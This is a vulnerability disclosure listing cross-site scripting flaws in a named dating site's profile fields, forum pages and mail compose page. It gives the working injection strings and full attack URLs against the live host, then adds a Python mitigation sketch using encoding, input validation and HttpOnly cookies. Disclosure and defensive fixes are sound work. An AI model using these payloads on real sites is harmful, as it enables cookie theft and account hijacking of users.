Blacksingles.com

Homepage:

http://www.blacksingles.com


Affected files

Profile input boxes

Add a friend input box.

list.html

view.html

reply.html

compose.html

-------------------------------------------------


XSS vuln with cookie disclosure via the Location box.


User data isn't sanitized before it is rendered here. For a PoC, in the
Location input box below the "Please select your city" option, enter:


<img src=javascript:alert(document.cookie)>



Screenshots:

http://www.youfucktard.com/xsp/blacksingles1.jpg

http://www.youfucktard.com/xsp/blacksingles2.jpg

http://www.youfucktard.com/xsp/blacksingles5.jpg


When posting in a forum, as well as when writing a mail to someone from the
forum, your location is displayed along with your name/age etc. So the XSS
attack can occur here too.


----------------------------------------------------


XSS vuln via Add a friend input box.


Data isn't sanitized here either.


Screenshots:

http://www.youfucktard.com/xsp/blacksingles3.jpg


-------------------------------------------------------


list.html XSS vuln:


http://connect.blacksingles.com/boards/list.html?b=8";>">">">"><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<'<'



Screenshots:

http://www.youfucktard.com/xsp/blacksingles4.jpg


------------------------------------------------------


view.html XSS vuln:


http://connect.blacksingles.com/boards/view.html?b=8&t=485199";>">">">"><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<'<'


------------------------------------------------------


reply.html XSS vuln:


http://connect.blacksingles.com/boards/reply.html?b=8&t=485199&p=485199";>">">">"><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<'<'


----------------------------------------------------


XSS vuln via compose.html.


http://connect.blacksingles.com/mail/compose.html?u=admin";>">">">"><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<'<'



Screenshots:

http://www.youfucktard.com/xsp/blacksingles6.jpg


------------------------------------------------
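
Mitigation sketch, added here as an example (not code from the site or from the original advisory): output encoding for the stored Location field and allow-list validation for the b, t, p and u parameters. It assumes b, t and p are numeric ids and u is a short alphanumeric username; all function names are hypothetical.

```python
import html
import re

# Constructed sample inputs; the payload strings are the ones quoted in the advisory.
STORED_LOCATION = "<img src=javascript:alert(document.cookie)>"
REFLECTED_SUFFIX = "\";>\">\">\">\"><IMG SRC=javascript:alert('XSS')><\"<\"<\"<\"<'<'"

_ID_RE = re.compile(r"[0-9]{1,10}")             # assumed shape of b, t, p
_USER_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")  # assumed shape of u


def parse_id(raw):
    """Return the parameter as an int, or None if it is not a plain decimal id."""
    return int(raw) if _ID_RE.fullmatch(raw) else None


def parse_username(raw):
    """Return the username unchanged, or None if it falls outside the allow-list."""
    return raw if _USER_RE.fullmatch(raw) else None


def render_location(location):
    """HTML-encode a stored profile field before placing it in element content."""
    return '<span class="location">' + html.escape(location, quote=True) + "</span>"


def render_board_link(b, t):
    """Build a link from validated ids only; rejected input never reaches the markup."""
    board, thread = parse_id(b), parse_id(t)
    if board is None or thread is None:
        return None  # caller should answer 400 Bad Request
    return '<a href="view.html?b=%d&amp;t=%d">thread</a>' % (board, thread)


def session_cookie_header(token):
    """HttpOnly hides the cookie from document.cookie; it limits the cookie
    disclosure but does not replace the encoding and validation above."""
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax" % token


if __name__ == "__main__":
    print(render_location(STORED_LOCATION))
    print(render_board_link("8", "485199"))
    print(render_board_link("8", "485199" + REFLECTED_SUFFIX))  # None
    print(session_cookie_header("constructed-token"))
```

The same encoding has to be applied wherever the location is displayed, including forum posts and mail views.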
